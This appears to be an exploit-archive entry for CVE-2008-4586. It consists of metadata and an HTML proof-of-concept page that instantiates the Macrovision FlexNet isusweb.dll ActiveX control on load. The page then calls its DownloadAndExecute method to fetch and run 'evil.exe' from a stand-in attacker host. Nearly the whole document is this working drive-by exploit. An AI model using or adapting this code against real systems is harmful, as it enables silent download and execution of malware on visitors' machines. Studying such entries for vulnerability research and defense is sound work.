Macrovision FlexNet - 'isusweb.dll' DownloadAndExecute Method

Author: Elazar
type: remote
platform: windows
port: 
date_added: 2008-01-14 
date_updated:  
verified: 1 
codes: OSVDB-41873;CVE-2008-4586 
tags: 
aliases:  
screenshot_url:  
application_url: 

<!--
Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit
Implemented Categories:
Category: Safe for Scripting
Written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, isusweb.dll version 6.1.100.61372
-->
<html>
 <head>
  <title>Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
     	      							  obj.DownloadAndExecute("Bla","{11111111-1111-1111-1111-111111111111}",0,"http://www.evilsite.com/evil.exe","evil.exe");

    }

   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:1DF951B1-8D40-4894-A04C-66AD824A0EEF" height="0" width="0">
     Unable to create object
    </object>
 </body>
</html>

# milw0rm.com [2008-01-15]